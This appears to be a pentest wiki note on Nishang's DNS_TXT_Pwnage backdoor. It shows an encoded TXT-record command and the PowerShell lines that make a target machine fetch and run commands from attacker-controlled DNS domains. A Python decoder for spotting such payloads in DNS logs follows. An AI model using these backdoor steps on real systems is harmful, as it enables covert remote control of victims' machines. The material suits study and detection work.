DNS TXT Command
https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1
https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1
Create a new PowerShell script file and convert it with Out-DnsTxt. The command used here is net user:
y0stUSgtTi3i5QIA
Add a TXT record for the domain. It is set locally here; normally it is configured on the domain provider's website.
![](https://www.heresecurity.wiki/~gitbook/image?url=https%3A%2F%2Fraw.githubusercontent.com%2Fxiaoy-sec%2FPentest_Note%2Fmaster%2Fimg%2F203.png&width=768&dpr=4&quality=100&sign=2dafb386&sv=1)
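Two more TXT records must also be created, one specifying the start string and one specifying the stop string.
Run on the target machine: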
>Import-Module .\DNS_TXT_Pwnage.ps1
>DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop
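For responders reviewing DNS logs, the following added example (not part of the original page or of Nishang) recovers the staged command from TXT answers. It assumes the encoding seen in the sample string above, Base64 over a raw DEFLATE stream, and reassembles payloads split across numbered subdomains; the function names and the sample records other than 1.zone.com are constructed for illustration.

```python
import base64
import binascii
import zlib
from collections import defaultdict

def decode_txt_payload(value):
    """Return the decoded text if value is Base64 over raw DEFLATE, else None."""
    try:
        raw = base64.b64decode(value, validate=True)
        # wbits=-15 selects a raw DEFLATE stream (no zlib/gzip header).
        text = zlib.decompress(raw, wbits=-15).decode("utf-8")
    except (binascii.Error, zlib.error, UnicodeDecodeError):
        return None
    return text if text.strip() else None

def triage(records):
    """records: iterable of (fqdn, txt_value) pairs taken from DNS answer logs.
    Returns {name: decoded_text} for every record or numbered chunk set that decodes."""
    hits = {}
    chunks = defaultdict(list)
    for name, value in records:
        text = decode_txt_payload(value)
        if text is not None:
            hits[name] = text
            continue
        # A lone chunk of a split payload will not inflate; group by parent zone.
        label, _, parent = name.partition(".")
        if label.isdigit():
            chunks[parent].append((int(label), value))
    for parent, parts in chunks.items():
        joined = "".join(v for _, v in sorted(parts))
        text = decode_txt_payload(joined)
        if text is not None:
            hits["*." + parent] = text
    return hits

# Constructed sample: 1.zone.com carries the string shown on this page;
# the other names and values are made up for the example.
SAMPLE = [
    ("zone.com", "v=spf1 -all"),          # ordinary SPF record
    ("start.zone.com", "cmd"),            # start marker, not a payload
    ("1.zone.com", "y0stUSgtTi3i5QIA"),
    ("stop.zone.com", "stop"),            # valid Base64 alphabet, not DEFLATE
    ("1.ps.example.test", "y0stUSgt"),    # same payload split in two chunks
    ("2.ps.example.test", "Ti3i5QIA"),
]

if __name__ == "__main__":
    for name, text in triage(SAMPLE).items():
        print(name, repr(text))
```

Ordinary TXT content such as SPF fails the strict Base64 check, and short markers that happen to be valid Base64 fail inflation, so only real payloads are reported.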